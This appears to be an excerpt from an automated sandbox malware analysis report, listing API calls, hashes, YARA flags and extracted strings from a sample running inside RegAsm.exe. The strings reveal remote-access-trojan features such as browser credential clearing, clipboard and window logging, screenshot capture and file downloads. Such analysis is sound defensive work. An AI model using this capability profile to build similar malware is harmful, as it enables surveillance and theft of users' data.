                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                • API String ID: 3472027048-1236744412
                                                                • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                APIs
                                                                • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                                                                • EnumDisplayDevicesW.USER32(?), ref: 00419560
                                                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DisplayEnum$Devices$Monitors
                                                                • String ID:
                                                                • API String ID: 1432082543-0
                                                                • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                                                                • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                                                                • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                                                                APIs
                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$ForegroundLength
                                                                • String ID: [ $ ]
                                                                • API String ID: 3309952895-93608704
                                                                • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                • String ID:
                                                                • API String ID: 188215759-0
                                                                • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                APIs
                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                • String ID:
                                                                • API String ID: 2633735394-0
                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                APIs
                                                                • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MetricsSystem
                                                                • String ID:
                                                                • API String ID: 4116985748-0
                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                APIs
                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                • String ID:
                                                                • API String ID: 1761009282-0
                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                APIs
                                                                • _free.LIBCMT ref: 1000655C
                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                • String ID: *?$.
                                                                • API String ID: 2667617558-3972193922
                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                APIs
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                • String ID: image/jpeg
                                                                • API String ID: 1291196975-3785015651
                                                                • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                APIs
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                • API String ID: 1881088180-3686566968
                                                                • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                APIs
                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ACP$OCP
                                                                • API String ID: 0-711371036
                                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                APIs
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                • String ID: image/png
                                                                • API String ID: 1291196975-2966254431
                                                                • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 481472006-1507639952
                                                                • Opcode ID: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                • Opcode Fuzzy Hash: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                APIs
                                                                • Sleep.KERNEL32 ref: 0041667B
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadFileSleep
                                                                • String ID: !D@
                                                                • API String ID: 1931167962-604454484
                                                                • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _strlen
                                                                • String ID: : $Se.
                                                                • API String ID: 4218353326-4089948878
                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                • API String ID: 481472006-2430845779
                                                                • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: alarm.wav$hYG
                                                                • API String ID: 1174141254-2782910960
